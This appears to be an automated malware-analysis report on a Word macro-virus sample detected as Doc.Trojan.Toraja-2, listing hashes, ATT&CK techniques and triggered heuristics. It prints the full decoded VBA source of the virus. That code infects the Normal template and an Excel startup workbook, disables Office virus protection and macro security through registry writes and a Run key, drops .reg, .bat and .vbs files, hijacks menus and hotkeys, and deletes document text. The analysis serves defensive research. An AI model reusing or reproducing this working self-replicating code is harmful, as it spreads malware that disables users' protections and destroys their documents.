Office (OLE) malware analysis — malicious · fcf766e417d59f2b

MALICIOUS

Office (OLE)

62.5 KB Created: 2004-07-12 14:52:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 55b17ddba2ce79164534a646126623fb SHA-1: 1dcb878a0b0e61577eeb4e4abb58147ae31639e9 SHA-256: fcf766e417d59f2b08c6791a7fe5514ed523f94ea166c61136654075c19944d9

536 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1071.001 Web Protocols

The sample contains critical heuristics indicating the presence of VBA macros, specifically AutoOpen and Auto_Open, which are designed to execute automatically. The macros utilize WScript.Shell and CreateObject, along with a Shell() call, strongly suggesting the intent to download and execute a second-stage payload. The ClamAV detection as 'Doc.Trojan.Toraja-2' further supports its malicious nature, though a specific family could not be confidently identified.

Heuristics 12

ClamAV: Doc.Trojan.Toraja-2 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Toraja-2
VBA macros detected medium 8 related findings OLE_VBA_MACROS

Document contains VBA macro code
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Shell "regedit.exe /s \windows.reg", vbHide
```
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")"
```
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
            .VirusProtection = False
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set xlsApp = CreateObject("Excel.Application")
```
VBA copies the workbook into the Excel XLSTART startup folder high OLE_VBA_XLSTART_PERSISTENCE

The macro saves a copy of the workbook into Application.StartupPath (the Excel XLSTART folder) so the code auto-loads every time Excel starts. This is the persistence stage of a resident Excel macro virus, not normal document behaviour.
Matched line in script
```
Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS"
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Auto_Open macro low OLE_VBA_AUTO

Auto_Open macro
Matched line in script
```
Sub Auto_Open()
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS

OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	14422 bytes
SHA-256: `484fc7bad0f56a2a4c7c6260f455ebe46d17e93944382ed9466c594c8a0c1610`
Detection ClamAV: Doc.Trojan.Toraja-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "WEToraja" Option Compare Text Dim obj As Variant Dim x As Variant Dim sehat As Boolean Dim actWindow Public Const app As String = "Application" Public Const appset As String = "Settings" Public Const appN As String = "AppName" Public Const TimerOn = "00:01:00" Const TempSN As String = "Psychologic" Const MacID As String = "Toraja" Const SN As String = "TorajaLand" Const xlogo As String = "logo" Global Infeksi As Boolean Global Active Global Temp Global TempPath Sub RegID() On Error Resume Next If GetSetting(app, appset, "TorajaDate") = "" Then SaveSetting app, appset, "TorajaDate", Format(Date + 7, "dd-mm-yyyy") If GetSetting(app, appset, "Version") <> SN Then SaveSetting app, appset, "Version", SN If GetSetting(app, appset, "ProgID") <> MacID & SN Then SaveSetting app, appset, "ProgID", "Toraja" End Sub Function Periksa() As Boolean Application.EnableCancelKey = 0 Dim getDate As Date On Error Resume Next getDate = GetSetting(app, appset, "TorajaDate") If getDate <= Date Then sponsor End Function Function objKorban(Sumber, Target) As Boolean On Error GoTo Lari sehat = False For Each obj In Target.VBProject.VBComponents If obj.Name = MacID & SN Then sehat = True If (obj.Name <> "ThisDocument") And (obj.Name <> "Reference To Normal") And (obj.Name <> "logo") And (obj.Name <> MacID & SN) And _ (Left(obj.Name, 5) <> "Sheet") And (obj.Name <> "ThisWorkbook") And (Left(obj.Name, 5) <> "Chart") Then Target.VBProject.VBComponents.Remove Target.VBProject.VBComponents(obj.Name) objKorban = True End If Next obj If sehat = False Then If Infect(Sumber, Target, MacID & SN) And Infect(Sumber, Target, xlogo) = True Then objKorban = True End If Lari: End Function Sub Sikat() On Error Resume Next Set x = Documents For Each x In Documents If x <> ActiveDocument Then objKorban ActiveDocument, x If Len(x.Path) <> 0 Then x.Save End If Next x SaveSetting app, appN, "Microsoft Excel", "False" End Sub Function Infect(Sumber, Target, obj As String) As Boolean On Error GoTo ILari Sumber.VBProject.VBComponents(obj).Export TempPath & obj Target.VBProject.VBComponents.Import TempPath & obj Infect = True Kill TempPath & obj Exit Function ILari: End Function Private Sub ExpXls() Dim xlsApp Dim sfile As String If (GetSetting(app, appN, "Microsoft Excel") <> "True") Then On Error GoTo ELari: Set xlsApp = CreateObject("Excel.Application") xlsApp.Workbooks.Add sfile = xlsApp.StartupPath & xlsApp.PathSeparator & "EXCEL" & SN & ".XLS" xlsApp.ActiveWorkbook.SaveAs sfile TempPath = Application.NormalTemplate.Path & Application.PathSeparator Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), MacID & SN Infect NormalTemplate, xlsApp.Workbooks("EXCEL" & SN & ".XLS"), "logo" xlsApp.Workbooks("EXCEL" & SN & ".XLS").VBProject.Name = TempSN & SN xlsApp.ActiveWindow.Visible = False xlsApp.Workbooks("EXCEL" & SN & ".XLS").Save xlsApp.Application.Quit SaveSetting app, appN, "Microsoft Excel", "True" Set xlsApp = Nothing End If ELari: End Sub Sub ExpDok() Dim dokApp If (GetSetting(app, appN, "Microsoft Word") <> "True") Then On Error GoTo DLari Set dokApp = CreateObject("Word.Application") dokApp.NormalTemplate.OpenAsDocument objKorban Workbooks("EXCEL" & SN & ".XLS"), dokApp.ActiveDocument dokApp.ActiveDocument.SaveAs ("normal.dot") dokApp.ActiveDocument.Close dokApp.Application.Quit SaveSetting app, appN, "Microsoft Word", "True" Set dokApp = Nothing End If DLari: End Sub Sub ActTemp() On Error Resume Next CekApp If objKorban(Active, Temp) = True Then Temp.VBProject.Name = TempSN & SN Temp.Save SaveSetting app, appN, Application.Name, "True" Infeksi = True End If End Sub Sub TempAct() On Error Resume Next CekApp If objKorban(Temp, Active) = True Then Active.VBProject.Name = MacID If Len(Active.Path) <> 0 Then Active.Save End If End Sub '----------------------- Manipulating command bars and keyboard Sub MExcel() On Error Resume Next For Each x In CommandBars.ActiveMenuBar.Controls("Tools").Controls("Macro").Controls x.OnAction = "amd" Next x WEBarC CommandBars("Ply").Controls("View Code").Delete With Application .OnKey "%{F2}", "periksa" .OnKey "%{F4}", "periksa" .OnKey "%{F8}", "periksa" .OnKey "%{F11}", "amd" .OnKey "{F12}", "periksa" .OnKey "^{o}", "OpenFile" End With CommandBars("Standard").Controls("Open").OnAction = "OpenFile" CommandBars("Worksheet Menu Bar").Controls("File").Controls("Open...").OnAction = "OpenFile" End Sub 'Change command bars Sub WEBarC() On Error Resume Next AturCmd CommandBars.ActiveMenuBar, False AturCmd CommandBars("Formatting"), False AturCmd CommandBars("Standard"), False AturCmd CommandBars("Control Toolbox"), True AturCmd CommandBars("Forms"), True AturCmd CommandBars("ActiveX Control"), True AturCmd CommandBars("Visual Basic"), True End Sub Sub AturCmd(cmd, param As Boolean) With cmd If param = True Then .Enabled = False .Visible = False End If End With End Sub Sub MWord() On Error Resume Next CustomizationContext = NormalTemplate With Options .VirusProtection = False .SaveNormalPrompt = False End With FindKey(BuildKeyCode(wdKeyAlt, wdKeyF8)).Disable FindKey(BuildKeyCode(wdKeyAlt, wdKeyF11)).Disable WEBarC End Sub Sub w2000() On Error Resume Next Siluman Dhemit Open "\windows.reg" For Output As #1 Print #1, "REGEDIT4" Print #1, Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Word\Security]" Print #1, """"; "Level"; """"; "=dword:00000001" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Excel\Security]" Print #1, """"; "Level"; """"; "=dword:00000001" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security]" Print #1, """"; "Level"; """"; "=dword:00000001" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]" Print #1, """"; "Level"; """"; "=dword:00000001" Print #1, "[Hkey_Local_Machine\software\microsoft\Windows\CurrentVersion\Run]" Print #1, """"; "FixSys"; """"; "="; """"; "regedit.exe /s \\windows.reg"; """" Close #1 On Error Resume Next Shell "regedit.exe /s \windows.reg", vbHide End Sub Sub Siluman() Open "\autosys.bat" For Output As #1 Print #1, "regedit /s \windows.reg" Close #1 End Sub Sub Dhemit() Open "\sysinfo.ini.vbs" For Output As #1 Print #1, "Dim WSH" Print #1, "Set WSH = WScript.CreateObject("; """WScript.Shell"""; ")" Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD""" Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\10"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD""" Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Word\Security\Level"""; ", 1, "; """REG_DWORD""" Print #1, "WSH.RegWrite "; """HKCU\Software\Microsoft\Office\9"; "."; "0\Excel\Security\Level"""; ", 1, "; """REG_DWORD""" Print #1, "Set WWA = WScript.CreateObject("; """Word.application"""; ")" Print #1, "WWA.Options.VirusProtection = False" Print #1, "WWA.Options.SaveNormalPrompt = False" Print #1, "WWA.Application.Quit" Close #1 End Sub Sub AutoExec() Application.EnableCancelKey = 0 Application.DisplayRecentFiles = False SaveSetting app, appN, "Microsoft Word", "True" w2000 MWord ExpXls RegID Documents.Add Application.OnTime Now + TimeValue(TimerOn), "Pewaktu" End Sub Sub AutoNew() On Error Resume Next TempAct End Sub Sub AutoOpen() On Error Resume Next Dim strRun As String Application.EnableCancelKey = 0 ActTemp Sikat w2000 MWord RegID If Infeksi = True Then strRun = TempSN & SN & "." & MacID & SN & ".Ketemu" Application.OnTime Now + TimeValue("00:01:00"), strRun End If End Sub Sub FileOpen() On Error Resume Next WordBasic.DisableAutoMacros 1 Dialogs(80).Show TempAct WordBasic.DisableAutoMacros 0 End Sub Sub Auto_Open() On Error Resume Next Application.EnableCancelKey = 0 XlsAct ExpDok w2000 Application.DisplayRecentFiles = False End Sub Private Sub AllWB() sehat = False For Each obj In Workbooks actWindow = obj.Name If actWindow = "EXCEL" & SN & ".XLS" Then sehat = True If obj.Path = Application.StartupPath And actWindow <> "EXCEL" & SN & ".XLS" Then obj.Close False Kill Application.StartupPath & Application.PathSeparator & actWindow End If Next obj If sehat = False Then PicuXlsAct End Sub Sub XlsAct() On Error Resume Next Application.EnableCancelKey = 0 Application.DisplayAlerts = False TempAct AllWB Application.OnSheetActivate = "" Application.OnSheetDeactivate = "" Application.OnWindow = "" MExcel Application.OnWindow = "EXCEL" & SN & ".XLS" & "!XlsAct" Application.DisplayAlerts = True Application.ScreenUpdating = True End Sub Sub OpenFile() On Error Resume Next Application.DisplayAlerts = False Application.Dialogs(1).Show XlsAct End Sub Sub PicuXlsAct() Dim Baru As String On Error Resume Next Application.ScreenUpdating = False Workbooks.Add Baru = Application.StartupPath & Application.PathSeparator & "EXCEL" & SN & ".XLS" ActiveWorkbook.SaveAs Baru ActiveWindow.Visible = False ActTemp End Sub Sub Pewaktu() Periksa Application.OnTime Now + TimeValue(TimerOn), "Pewaktu" End Sub Sub Ketemu() TempAct Infeksi = False End Sub Sub CekApp() If Application.Name = "Microsoft Word" Then Doc Else Xls End Sub Sub Doc() TempPath = Application.NormalTemplate.Path & Application.PathSeparator Set Active = ActiveDocument Set Temp = NormalTemplate End Sub Sub Xls() Set Active = ActiveWorkbook Set Temp = Workbooks("EXCEL" & SN & ".XLS") TempPath = Application.TemplatesPath End Sub Sub sponsor() Application.EnableCancelKey = 0 On Error Resume Next LOGO.Show End Sub Sub ToolsCustomizeKeyboard() right_animate End Sub Sub ViewCode() up_animate End Sub Sub ViewVBcode() wani2 End Sub Sub ToolsCustomize() bottom_animate End Sub Sub ToolsMacro() wani2 End Sub Sub ToolsRecordMacroToggle() wani2 End Sub Sub FileTemplates() left_animate End Sub Sub ViewSecurity() MsgBox (" Well...!! Do you want to change it ?? ask Psychologic to do that !!! ") left_animate right_animate bottom_animate up_animate wani2 Periksa End Sub Sub wani2() Application.EnableCancelKey = 0 Dim numchars As Integer numchars = ActiveDocument.Characters.Count Do While x < numchars x = x + 1 Selection.HomeKey Unit:=wdStory Selection.MoveRight Unit:=wdCharacter, Count:=1, Extend:=wdExtend Selection.Cut Loop End Sub Sub amd() Dim angka angka = 0 On Error Resume Next ActiveWindow.Zoom = 80 Rows("1:101").Select Selection.RowHeight = 23 Range("A1").Select Do While angka < 17 angka = angka + 1 x = Animate("d", angka) x = Animate("a", angka) x = Animate("b", angka) x = Animate("c", angka) x = Animate("F", angka) x = Animate("g", angka) x = Animate("i", angka) x = Animate("h", angka) x = Animate("j", angka) x = Animate("e", angka) Loop End Sub Function Animate(ax, bx) Application.EnableCancelKey = 0 Dim x Dim c x = 0 Do While x < 17 x = x + 1 Range(ax & bx).Select Selection.Font.ColorIndex = 3 Selection.Copy Range(ax & x).Select For c = 1 To 11250 c = c + 1 Next Loop Range(ax & bx).Select Selection.Copy Range(ax & x).Select ActiveSheet.Paste Range(ax & bx).Select Selection.ClearContents Range(ax & bx).Select End Function Sub bottom_animate() Application.EnableCancelKey = 0 On Error Resume Next Dim cbar1 Dim y y = 0 Do While y < 10 y = y + 1 Dim x x = 0 Do While x < 15 x = x + 1 Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarTop) cbar1.Visible = True Loop Dim z z = 0 Do While z < 15 z = z + 1 CommandBars("TorajaLand" + Str(z)).Delete Loop Loop End Sub Sub left_animate() Application.EnableCancelKey = 0 On Error Resume Next Dim cbar1 Dim y y = 0 Do While y < 10 y = y + 1 Dim x x = 0 Do While x < 15 x = x + 1 Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarLeft) cbar1.Visible = True Loop Dim z z = 0 Do While z < 15 z = z + 1 CommandBars("TorajaLand" + Str(z)).Delete Loop Loop End Sub Sub right_animate() Application.EnableCancelKey = 0 On Error Resume Next Dim cbar1 Dim y y = 0 Do While y < 10 y = y + 1 Dim x x = 0 Do While x < 21 x = x + 1 Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarRight) cbar1.Visible = True Loop Dim z z = 0 Do While z < 21 z = z + 1 CommandBars("TorajaLand" + Str(z)).Delete Loop Loop End Sub Sub up_animate() Application.EnableCancelKey = 0 On Error Resume Next Dim cbar1 Dim y y = 0 Do While y < 10 y = y + 1 Dim x x = 0 Do While x < 15 x = x + 1 Set cbar1 = CommandBars.Add(Name:="TorajaLand" + Str(x), Position:=msoBarBottom) cbar1.Visible = True Loop Dim z z = 0 Do While z < 15 z = z + 1 CommandBars("TorajaLand" + Str(z)).Delete Loop Loop End Sub Attribute VB_Name = "LOGO" Attribute VB_Base = "0{C86A27B0-D44D-11D8-9C6E-DF5DD9CB4755}{C86A2755-D44D-11D8-9C6E-DF5DD9CB4755}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False

Open this report in the interactive analyzer, or submit your own file for analysis.